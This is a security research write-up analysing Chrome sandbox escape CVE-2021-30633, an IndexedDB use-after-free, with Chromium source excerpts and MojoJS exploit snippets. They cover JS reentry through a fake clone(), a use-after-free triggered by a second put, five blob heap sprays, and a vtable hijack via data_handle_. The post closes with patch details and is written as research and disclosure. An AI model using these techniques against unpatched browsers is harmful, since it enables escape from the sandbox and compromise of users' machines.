preface

Recently, @HungTT28 published his full-chain exploit on his blog; the sandbox escape used CVE-2021-30633. Wuheng Laboratory had also written an exploit for this vulnerability earlier, and the blog post provided some inspiration. Below we share Wuheng Laboratory's experience with CVE-2021-30633, in the hope of learning from and exchanging with the industry.

Root Cause

Let's first look at the root cause of the vulnerability, starting from the patch. The most important part is the following function:

bool IsAcceptingRequests() {
  return !is_commit_pending_ && state_ != COMMITTING && state_ != FINISHED;
}

The patch adds this check to every DatabaseImpl and TransactionImpl interface method, preventing requests from being processed while the transaction is in the COMMITTING or FINISHED state. Conversely, this means that continuing to issue requests on a transaction in either of these two states leads to the vulnerability.

The FINISHED state does not offer a good entry point, so we focus on the COMMITTING state instead. That state can be set through the two functions IndexedDBTransaction::Commit() and TransactionImpl::Commit(), and there is an interesting call chain:

IndexedDBTransaction::Commit --> IndexedDBBackingStore::Transaction::CommitPhaseOne --> IndexedDBBackingStore::Transaction::WriteNewBlobs

blob_storage or file_system_access is then used to write the committed data to disk:

        case IndexedDBExternalObject::ObjectType::kFile:
        case IndexedDBExternalObject::ObjectType::kBlob: {
          if (entry.size() == 0)
            continue;
          // If this directory creation fails then the WriteBlobToFile call
          // will fail. So there is no need to special-case handle it here.
          base::FilePath path = GetBlobDirectoryNameForKey(
              backing_store_->blob_path_, database_id_, entry.blob_number());
          backing_store_->filesystem_proxy_->CreateDirectory(path);
          // TODO(dmurph): Refactor IndexedDBExternalObject to not use a
          // SharedRemote, so this code can just move the remote, instead of
          // cloning.
          mojo::PendingRemote<blink::mojom::Blob> pending_blob;
          entry.remote()->Clone(pending_blob.InitWithNewPipeAndPassReceiver());

          // Android doesn't seem to consistently be able to set file
          // modification times. The timestamp is not checked during reading
          // on Android either. https://crbug.com/1045488
          absl::optional<base::Time> last_modified;
          blob_storage_context->WriteBlobToFile(
              std::move(pending_blob),
              backing_store_->GetBlobFileName(database_id_,
                                              entry.blob_number()),
              IndexedDBBackingStore::ShouldSyncOnCommit(durability_),
              last_modified, write_result_callback);
          break;
        }
        case IndexedDBExternalObject::ObjectType::kFileSystemAccessHandle: {
          if (!entry.file_system_access_token().empty())
            continue;
          // TODO(dmurph): Refactor IndexedDBExternalObject to not use a
          // SharedRemote, so this code can just move the remote, instead of
          // cloning.
          mojo::PendingRemote<blink::mojom::FileSystemAccessTransferToken>
              token_clone;
          entry.file_system_access_token_remote()->Clone(
              token_clone.InitWithNewPipeAndPassReceiver());
          backing_store_->file_system_access_context_->SerializeHandle(
              std::move(token_clone),
              base::BindOnce(
                  [](base::WeakPtr<Transaction> transaction,
                     IndexedDBExternalObject* object,
                     base::OnceCallback<void(
                         storage::mojom::WriteBlobToFileResult)> callback,
                     const std::vector<uint8_t>& serialized_token) {
                    // |object| is owned by |transaction|, so make sure
                    // |transaction| is still valid before doing anything else.
                    if (!transaction)
                      return;
                    if (serialized_token.empty()) {
                      std::move(callback).Run(
                          storage::mojom::WriteBlobToFileResult::kError);
                      return;
                    }
                    object->set_file_system_access_token(serialized_token);
                    std::move(callback).Run(
                        storage::mojom::WriteBlobToFileResult::kSuccess);
                  },
                  weak_ptr_factory_.GetWeakPtr(), &entry,
                  write_result_callback));
          break;
        }

Through Clone we can re-enter JS. Before getting there, let's cover some background. We start with the following example, a common binding operation:

var fileAccessPtr = new blink.mojom.FileSystemAccessTransferTokenPtr();
var fileAccessRequest = mojo.makeRequest(fileAccessPtr);
Mojo.bindInterface(blink.mojom.FileSystemAccessTransferToken.name, fileAccessRequest.handle);

Here’s a graph to help you understand:

fileAccessPtr and fileAccessRequest represent the client and service ends of the interface connection respectively, which are connected via mojo.makeRequest.

mojo.makeRequest creates a message pipe, fills one end of the pipe into the output parameter (either an InterfacePtrInfo or an interface pointer), and returns the other end wrapped in an InterfaceRequest instance.

  // |output| could be an interface pointer, InterfacePtrInfo or
  // AssociatedInterfacePtrInfo.
  function makeRequest(output) {
    if (output instanceof mojo.AssociatedInterfacePtrInfo) {
      var {handle0, handle1} = internal.createPairPendingAssociation();
      output.interfaceEndpointHandle = handle0;
      output.version = 0;

      return new mojo.AssociatedInterfaceRequest(handle1);
    }

    if (output instanceof mojo.InterfacePtrInfo) {
      var pipe = Mojo.createMessagePipe();
      output.handle = pipe.handle0;
      output.version = 0;

      return new mojo.InterfaceRequest(pipe.handle1);
    }

    var pipe = Mojo.createMessagePipe();
    output.ptr.bind(new mojo.InterfacePtrInfo(pipe.handle0, 0));
    return new mojo.InterfaceRequest(pipe.handle1);
  }

Mojo.bindInterface calls the bindInterface function:

//third_party/blink/renderer/core/mojo/mojo.cc
// static
void Mojo::bindInterface(ScriptState* script_state,
                         const String& interface_name,
                         MojoHandle* request_handle,
                         const String& scope) {
  std::string name = interface_name.Utf8();
  auto handle =
      mojo::ScopedMessagePipeHandle::From(request_handle->TakeHandle());

  if (scope == "process") {
    Platform::Current()->GetBrowserInterfaceBroker()->GetInterface(
        mojo::GenericPendingReceiver(name, std::move(handle)));
    return;
  }

  ExecutionContext::From(script_state)
      ->GetBrowserInterfaceBroker()
      .GetInterface(name, std::move(handle));
}

Via GetInterface on the BrowserInterfaceBroker established between the renderer and the browser, the bind function registered with map->Add is called, creating the implementation corresponding to the Mojo interface and binding it to a Receiver. This allows browser-process code to be called from the renderer's remote.

So how do we re-enter JS?

function FileSystemAccessTransferTokenImpl() {
  this.binding = new mojo.Binding(blink.mojom.FileSystemAccessTransferToken, this);
}

FileSystemAccessTransferTokenImpl.prototype = {
  clone: async (arg0) => {
    // custom
  }
};

var fileAccessPtr = new blink.mojom.FileSystemAccessTransferTokenPtr();
var fileAccessImpl = new FileSystemAccessTransferTokenImpl();
var fileAccessRequest = mojo.makeRequest(fileAccessPtr);
fileAccessImpl.binding.bind(fileAccessRequest);

First, implement a fileAccessImpl in the renderer layer (i.e. in JS), then define the custom clone method you want, and bind the InterfaceRequest returned by mojo.makeRequest to fileAccessImpl.

// ---------------------------------------------------------------------------
// |request| could be omitted and passed into bind() later.
//
// Example:
//
//    // FooImpl implements mojom.Foo.
//    function FooImpl() { ... }
//    FooImpl.prototype.fooMethod1 = function() { ... }
//    FooImpl.prototype.fooMethod2 = function() { ... }
//
//    var fooPtr = new mojom.FooPtr();
//    var request = makeRequest(fooPtr);
//    var binding = new Binding(mojom.Foo, new FooImpl(), request);
//    fooPtr.fooMethod1();
function Binding(interfaceType, impl, requestOrHandle) {
  this.interfaceType_ = interfaceType;
  this.impl_ = impl;
  this.router_ = null;
  this.interfaceEndpointClient_ = null;
  this.stub_ = null;

  if (requestOrHandle)
    this.bind(requestOrHandle);
}

...

Binding.prototype.bind = function(requestOrHandle) {
  this.close();

  var handle = requestOrHandle instanceof mojo.InterfaceRequest ?
      requestOrHandle.handle :
      requestOrHandle;
  if (!(handle instanceof MojoHandle))
    return;

  this.router_ = new internal.Router(handle);
  this.stub_ = new this.interfaceType_.stubClass(this.impl_);
  this.interfaceEndpointClient_ = new internal.InterfaceEndpointClient(
      this.router_.createLocalEndpointHandle(internal.kPrimaryInterfaceId),
      this.stub_, this.interfaceType_.kVersion);

  this.interfaceEndpointClient_.setPayloadValidators([
      this.interfaceType_.validateRequest]);
};

Instead of sending the PendingReceiver from the renderer to the browser and having the interface implementation live on the browser side, the receiver end is bound inside the renderer itself, so calls made on the remote end up invoking code in the renderer.
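A quick sanity check of this loop-back, as a minimal sketch reusing only the objects defined above (probePtr is just an illustrative name, and the argument conventions follow the legacy MojoJS bindings used in the other snippets):

// Hypothetical probe: because the receiver end is bound to fileAccessImpl in
// this renderer, this clone() call is dispatched to the JS method defined
// above rather than to any browser-side implementation.
var probePtr = new blink.mojom.FileSystemAccessTransferTokenPtr();
fileAccessPtr.clone(mojo.makeRequest(probePtr));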

Then we pass the remote into the external object:

var external_object = new blink.mojom.IDBExternalObject();
external_object.fileSystemAccessToken = fileAccessPtr;
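For context, a hedged sketch of how the first put might carry this object (the field and argument order follow the clone() snippet shown later; setting up idbTransactionPtr and object_store_id over the IDBFactory/IDBDatabase interfaces is assumed to have happened elsewhere):

// First put: value carries our external object, whose token remote is backed
// by the JS clone() implementation.
var value = new blink.mojom.IDBValue();
value.bits = [0x41, 0x41, 0x41, 0x41];
value.externalObjects = [external_object];

var key = new blink.mojom.IDBKey();
key.string = new mojoBase.mojom.String16();
key.string.data = "key";              // the same key is reused in clone()

idbTransactionPtr.put(object_store_id, value, key,
                      blink.mojom.IDBPutMode.AddOrUpdate, []);
// Committing drives WriteNewBlobs, which calls Clone() on
// entry.file_system_access_token_remote() -- i.e. our clone().
idbTransactionPtr.commit(0);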

When IndexedDBBackingStore::Transaction::WriteNewBlobs obtains the passed-in remote via entry.file_system_access_token_remote(), the subsequent Clone call reaches the JS code we defined, which achieves re-entry into JS.

entry.file_system_access_token_remote()->Clone(
              token_clone.InitWithNewPipeAndPassReceiver());

Here, we define clone as follows:

FileSystemAccessTransferTokenImpl.prototype = {
  clone: async (arg0) => {
    // IndexedDBBackingStore::Transaction::WriteNewBlobs is waiting for the
    // write to complete, so we can hook the COMMITTING state_ of the
    // transaction. Replace the key/value in the object store to delete the
    // external object.
    print(" === clone === ");

    var value = new blink.mojom.IDBValue();
    value.bits = [0x41, 0x41, 0x41, 0x41];
    value.externalObjects = [];

    var key = new blink.mojom.IDBKey();
    key.string = new mojoBase.mojom.String16();
    key.string.data = "key";

    var mode = blink.mojom.IDBPutMode.AddOrUpdate;
    var index_keys = [];
    idbTransactionPtr.put(object_store_id, value, key, mode, index_keys);

    // commit forces the put operation
    idbTransactionPtr.commit(0);

    for (let i = 0; i < 0x1000; i++) {
      var a = new Blob([heap1]);
      blob_list.push(a);
    }
    done = true;

    // Get a token for the file handle; control flow comes back to the callback
    // holding the cached external object ==> UAF
    fileAccessHandlePtr.transfer(arg0);
  }
};

Here’s one caveat:

          entry.file_system_access_token_remote()->Clone(
              token_clone.InitWithNewPipeAndPassReceiver());

          backing_store_->file_system_access_context_->SerializeHandle

Clone is called asynchronously, so we need to determine the actual order of execution in practice.
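One hedged way for the outer script to synchronize on that ordering is to poll the done flag that the clone() body above sets:

// Sketch only: wait until clone() has finished its reentrant work before the
// rest of the exploit continues.
var done = false;  // set to true at the end of clone()
function waitForClone() {
  return new Promise(resolve => {
    (function poll() { done ? resolve() : setTimeout(poll, 50); })();
  });
}
// e.g.  idbTransactionPtr.commit(0);  await waitForClone();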

The main cause of the UAF can be broken down into three parts:

1. Cause of the UAF

Freeing external_objects involves two put requests; the free happens in the second put, issued from within the reentrant clone.

The call chain to release external_objects looks like this:

TransactionImpl::Put --> IndexedDBDatabase::PutOperation --> IndexedDBBackingStore::PutRecord --> IndexedDBBackingStore::Transaction::PutExternalObjectsIfNeeded

In TransactionImpl::Put, params stores the object_store_id, value, key, mode, and index_keys that we passed in. The key offsets are as follows:

params->object_store_id   offset: 0x0
params->value             offset: 0x8 ~ 0x30
params->key               offset: 0x38

params->value is of type IndexedDBValue:

struct CONTENT_EXPORT IndexedDBValue {
......
  std::string bits;
  std::vector<IndexedDBExternalObject> external_objects;
};

Since we will free the external_object later, we added a log here to print its address and size. This size, 184, is the allocation size we will target in the later heap spray.

The second put is issued from within clone. In it we pass an empty external_objects, and the bits and the key (which will be reused later) are the same as in the first put.

The free happens here: since the external_objects we pass the second time is empty, execution reaches external_object_change_map_.erase. Because object_store_data_key is the same in both cases, the external_object passed in the first put is released.

Status IndexedDBBackingStore::Transaction::PutExternalObjectsIfNeeded(
    int64_t database_id,
    const std::string& object_store_data_key,
    std::vector<IndexedDBExternalObject>* external_objects) {
  DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_);

  if (!external_objects || external_objects->empty()) {
    external_object_change_map_.erase(object_store_data_key);  // free here!!
    incognito_external_object_map_.erase(object_store_data_key);
    ......
}

class IndexedDBExternalObjectChangeRecord {
  ........
 private:
  std::string object_store_data_key_;
  std::vector<IndexedDBExternalObject> external_objects_;
};

Debugging object_store_data_key across the two PutExternalObjectsIfNeeded calls confirms that it is the same.

2. The role of commit in clone

Since Clone is invoked during the previous commit, we are still inside the commit flow of the previous transaction. If we only issue the put request at this point, it will not be processed immediately; the earlier operation is handled first. See the figure below:

To leak the token address, the put must take effect before set_file_system_access_token runs. The commit is used to force the put through, achieving the effect we want.

A new question arises: won't the commit issued inside the reentrant clone trigger the commit flow again?

The answer is no. Let’s look at the following code:

IndexedDBTransaction::RunTasks() {
  .......
  // If there are no pending tasks, we haven't already committed/aborted,
  // and the front-end requested a commit, it is now safe to do so.
  if (!HasPendingTasks() && state_ == STARTED && is_commit_pending_) {
    processing_event_queue_ = false;
    // This can delete |this|.
    leveldb::Status result = Commit();  // IndexedDBTransaction::Commit()
    if (!result.ok())
      return {RunTasksResult::kError, result};
  }
  ...
}

As can be seen, IndexedDBTransaction::Commit (and subsequently WriteNewBlobs) is only called when state_ == STARTED. When we call commit the second time, state_ is already COMMITTING.

First commit:

Second commit:

3. The role of transfer

First let’s look at the call chain:

FileSystemAccessManagerImpl::SerializeHandle --> FileSystemAccessManagerImpl::ResolveTransferToken --> FileSystemAccessManagerImpl::DoResolveTransferToken  --> FileSystemAccessManagerImpl::DoResolveTransferToken --> FileSystemAccessManagerImpl::DidResolveForSerializeHandle 

As you can see, DoResolveTransferToken needs to find the token in transfer_tokens_ in order for the SerializeHandle callback to eventually be reached:

void FileSystemAccessManagerImpl::DoResolveTransferToken(
    mojo::Remote<blink::mojom::FileSystemAccessTransferToken>,
    ResolvedTokenCallback callback,
    const base::UnguessableToken& token) {
  DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_);

  auto it = transfer_tokens_.find(token);
  if (it == transfer_tokens_.end()) {
    std::move(callback).Run(nullptr);
  } else {
    std::move(callback).Run(it->second.get());
  }
}

This is why we call fileAccessHandlePtr.transfer(arg0) inside clone: transfer registers a real token in transfer_tokens_ and binds it to arg0, the pending receiver that the browser passed to our clone, so the lookup above succeeds.

void FileSystemAccessManagerImpl::DidResolveForSerializeHandle(
    SerializeHandleCallback callback,
    FileSystemAccessTransferTokenImpl* resolved_token) {
  if (!resolved_token) {
    std::move(callback).Run({});
    return;
  }
  ...
  std::string value;
  bool success = data.SerializeToString(&value);
  DCHECK(success);
  std::vector<uint8_t> result(value.begin(), value.end());
  std::move(callback).Run(result);
}

The FileSystemAccessTransferTokenImpl handed over by DoResolveTransferToken is processed into result, which becomes the serialized_token in object->set_file_system_access_token(serialized_token).

backing_store_->file_system_access_context_->SerializeHandle(
    std::move(token_clone),
    base::BindOnce(
        [](base::WeakPtr<Transaction> transaction,
           IndexedDBExternalObject* object,
           base::OnceCallback<void(
               storage::mojom::WriteBlobToFileResult)> callback,
           const std::vector<uint8_t>& serialized_token) {
          // |object| is owned by |transaction|, so make sure
          // |transaction| is still valid before doing anything else.
          if (!transaction)
            return;
          if (serialized_token.empty()) {
            std::move(callback).Run(
                storage::mojom::WriteBlobToFileResult::kError);
            return;
          }
          object->set_file_system_access_token(serialized_token);
          std::move(callback).Run(
              storage::mojom::WriteBlobToFileResult::kSuccess);
        },
        weak_ptr_factory_.GetWeakPtr(), &entry, write_result_callback));
break;

One thing to note here:

During SerializeToString, an 8-byte header is produced and placed at the start of the token, followed by our file_name. Therefore, when using file_name to control the token size, note that the token will be 0x8 bytes larger than file_name.

summary

The above was divided into three parts; let's now put them together:

  • We can use clone to re-enter JS and issue a second put from inside clone.
  • If the second put passes an empty external_objects with the same key, the external_object from the first put is freed.
  • The token is passed to set_file_system_access_token via transfer.
  • The commit forces PutExternalObjectsIfNeeded to execute ("jump the queue") before set_file_system_access_token.
  • After reclaiming the freed external_object with a blob spray, set_file_system_access_token writes the token into our blob. By reading the blob we obtain the begin address of the token (a std::vector).

exploitation

Exploitation of the vulnerability involves five heap sprays; I will introduce each one in turn below.

First heap spray:

The target of this heap spray is the freed external_object. Blobs are sprayed to reclaim the external_object's memory, and set_file_system_access_token is then called to write the token into that memory:

void IndexedDBExternalObject::set_file_system_access_token(
    std::vector<uint8_t> token) {
  DCHECK_EQ(object_type_, ObjectType::kFileSystemAccessHandle);
  file_system_access_token_ = std::move(token);
}

Before set_file_system_access_token:

After set_file_system_access_token:

Then read the blob to obtain the address shown in red in the figure above.
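As a rough sketch of this step (the 184-byte size comes from the log mentioned earlier; the fill marker and the scanning logic are assumptions for illustration):

// heap1 is the buffer sprayed from clone(); its size matches the freed
// external_object allocation (184 bytes in the tested build) and is filled
// with a recognizable marker.
const FILL = 0x4141414141414141n;
var heap1 = new ArrayBuffer(184);
new BigUint64Array(heap1).fill(FILL);
var blob_list = [];

// After set_file_system_access_token() has run, scan the sprayed blobs for a
// qword that no longer matches the marker: that slot now holds the begin
// pointer of the token std::vector.
async function findLeakedTokenPtr() {
  for (const b of blob_list) {
    const u64 = new BigUint64Array(await b.arrayBuffer());
    for (let i = 0; i < u64.length; i++) {
      if (u64[i] !== FILL) {
        return { blob: b, offset: i * 8, addr: u64[i] };
      }
    }
  }
  return null;
}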

Second heap spray:

This time, the blob is filled based on the address leaked from the first blob. Since std::vector overloads the = operator, a non-empty assignment will free the token.

The main purpose of freeing the token is that its size and content can be controlled via file_name. This effectively converts the external_object UAF into a token UAF.

Third heap spray:

When a new blob is registered via the RegisterFromStream interface, a new BlobDataItem is allocated:

BlobRegistryImpl::RegisterFromStream --> BlobBuilderFromStream::Start --> BlobBuilderFromStream::AllocateMoreMemorySpace --> BlobDataItem::CreateBytesDescription

---------------------------------------------------------------------------

void BlobBuilderFromStream::AllocateMoreMemorySpace(
    uint64_t length_hint,
    mojo::PendingAssociatedRemote<blink::mojom::ProgressClient> progress_client,
    mojo::ScopedDataPipeConsumerHandle pipe) {
  ..........
  std::vector<scoped_refptr<ShareableBlobDataItem>> chunk_items;
  while (length_hint > 0) {
    const auto block_size = std::min<uint64_t>(kMemoryBlockSize, length_hint);

    chunk_items.push_back(base::MakeRefCounted<ShareableBlobDataItem>(
        BlobDataItem::CreateBytesDescription(block_size),
        ShareableBlobDataItem::QUOTA_NEEDED));

    length_hint -= block_size;
  }
  ...
}

---------------------------------------------------------------------------

scoped_refptr<BlobDataItem> BlobDataItem::CreateBytesDescription(
    size_t length) {
  return base::WrapRefCounted(
      new BlobDataItem(Type::kBytesDescription, 0, length));
}

BlobDataItem stores data_handle_, and our ultimate goal is to occupy a BlobDataItem so we can modify data_handle_, hijacking the execution flow by overwriting DataHandle's virtual function table.

class COMPONENT_EXPORT(STORAGE_BROWSER) BlobDataItem
    : public base::RefCounted<BlobDataItem> {

    ........

  Type type_;
  uint64_t offset_;
  uint64_t length_;

  std::vector<uint8_t> bytes_;    // For Type::kBytes.
  base::FilePath path_;           // For Type::kFile.
  FileSystemURL filesystem_url_;  // For Type::kFileFilesystem.
  base::Time
      expected_modification_time_;  // For Type::kFile and kFileFilesystem.

  scoped_refptr<DataHandle> data_handle_;           // For kReadableDataHandle.
  scoped_refptr<ShareableFileReference> file_ref_;  // For Type::kFile

  scoped_refptr<FileSystemContext>
      file_system_context_;  // For Type::kFileFilesystem.
};

We can log the size of BlobDataItem in the current version. Since the size of the token is under our control, we keep it the same size as BlobDataItem for the later heap spray.

In the environment used here, BlobDataItem has a size of 424, so file_name has a size of 424 - 8 (the reason for the -8 is mentioned above).
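In JS terms this is just the following (a trivial sketch; 424 is specific to the build being tested):

// Pick the file name length so the serialized token lands in the same
// allocation bucket as BlobDataItem (8 bytes of header are prepended).
const BLOB_DATA_ITEM_SIZE = 424;
const fileName = "A".repeat(BLOB_DATA_ITEM_SIZE - 8);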

From the second heap spray we have a freed token of size 424; at this point we can spray BlobDataItems into the token slot by calling RegisterFromStream.
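A hedged sketch of how this spray might be driven from JS. RegisterFromStream and its parameters come from blob_registry.mojom, but the exact JS binding names, the "process" scope, and passing null for the optional progress client are assumptions:

// Each kMemoryBlockSize-sized chunk implied by length_hint allocates one
// BlobDataItem object (424 bytes in this build), so a large length_hint
// sprays many of them without ever finishing the stream.
function sprayBlobDataItems(lengthHint) {
  let blobRegistryPtr = new blink.mojom.BlobRegistryPtr();
  Mojo.bindInterface(blink.mojom.BlobRegistry.name,
                     mojo.makeRequest(blobRegistryPtr).handle, "process");

  let pipe = Mojo.createDataPipe({elementNumBytes: 1, capacityNumBytes: 64});
  blobRegistryPtr.registerFromStream("text/plain", "", lengthHint,
                                     pipe.consumer, null);
  return pipe.producer;  // keep the producer alive so the stream stays open
}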

Fourth heap spray:

This heap spray follows the same process as the second one. Its purpose is to free the token (which is now actually a BlobDataItem) once more, which is equivalent to obtaining a freed BlobDataItem.

Fifth heap spray:

This time we can spray BlobDataItem contents directly. We complete the attack by placing the ROP chain in the blob and overwriting DataHandle's virtual function table, then overwriting the pointer at offset 0x190 (data_handle_) with the address of the gadget - 0x10.
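A hedged sketch of building that payload (only the 424-byte object size and the 0x190 offset of data_handle_ are taken from the analysis above; the gadget address is a BigInt obtained from the earlier leaks, and the fake vtable / ROP layout is omitted):

// Build the fake BlobDataItem contents sprayed in this fifth step.
function buildFakeBlobDataItem(gadgetAddr /* BigInt */) {
  const payload = new ArrayBuffer(424);
  const u64 = new BigUint64Array(payload);
  // data_handle_ sits at offset 0x190; pointing it at gadget - 0x10 makes the
  // virtual call made through it land on our gadget.
  u64[0x190 / 8] = gadgetAddr - 0x10n;
  // ... remaining offsets would hold the fake DataHandle vtable and ROP chain ...
  return payload;
}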

Finally, the BlobImpl::ReadSideData interface is used to trigger the virtual call through the overwritten data_handle_, hijacking the execution flow:

void BlobImpl::ReadSideData(ReadSideDataCallback callback) {
  handle_->RunOnConstructionComplete(base::BindOnce(
      [](BlobDataHandle handle, ReadSideDataCallback callback,
         BlobStatus status) {
        if (status != BlobStatus::DONE) {
          DCHECK(BlobStatusIsError(status));
          std::move(callback).Run(absl::nullopt);
          return;
        }

        auto snapshot = handle.CreateSnapshot();
        // Currently side data is supported only for blobs with a single entry.
        const auto& items = snapshot->items();
        if (items.size() != 1) {
          std::move(callback).Run(absl::nullopt);
          return;
        }
        const auto& item = items[0];
        if (item->type() != BlobDataItem::Type::kReadableDataHandle) {
          std::move(callback).Run(absl::nullopt);
          return;
        }

        int32_t body_size = item->data_handle()->GetSideDataSize();
        if (body_size == 0) {
          std::move(callback).Run(absl::nullopt);
          return;
        }
        item->data_handle()->ReadSideData(base::BindOnce(
            [](ReadSideDataCallback callback, int result,
               mojo_base::BigBuffer buffer) {
              if (result < 0) {
                std::move(callback).Run(absl::nullopt);
                return;
              }
              std::move(callback).Run(std::move(buffer));
            },
            std::move(callback)));
      },
      *handle_, std::move(callback)));
}
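From the renderer, the trigger might look like this (a sketch only: blobPtr is assumed to be a blink.mojom.Blob remote for the blob whose BlobDataItem we replaced, for example kept from an earlier registration reply; the method name follows the mojom definition above):

// Hypothetical trigger: readSideData() reaches the
// item->data_handle()->GetSideDataSize() / ReadSideData() virtual calls shown
// above, now going through our fake data_handle_.
blobPtr.readSideData().then(reply => {
  // by this point, control flow has been hijacked inside the browser process
});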

Since the layout of the ROP chain is already given in the exploit, I will not analyze it in detail.

Security recommendations

  • Google has officially provided the following patches for the vulnerability:

    • chromium-review.googlesource.com/c/chromium/…
    • chromium-review.googlesource.com/c/chromium/…
    • chromium-review.googlesource.com/c/chromium/…
  • This vulnerability can be avoided by patching or updating to secure version 93.0.4577.82 or later.

conclusion

  • Overall, the exploitation of this vulnerability is not ideal in terms of stability and time cost because of the large number of heap sprays required. Nevertheless, there is a lot to learn from the approach, which is a very clever exploitation technique.
  • Wuheng Laboratory is dedicated to safeguarding ByteDance's products and business, and the security of third-party applications is equally critical to business security. While testing the company's own products, Wuheng Laboratory also pays close attention to the security of third-party applications, has established a vulnerability mitigation mechanism for them, and will continue to share research results with the industry to help enterprises avoid security risks. We also hope to cooperate with industry peers and contribute to the development of the network security industry.

References:

starlabs.sg/blog/2022/0…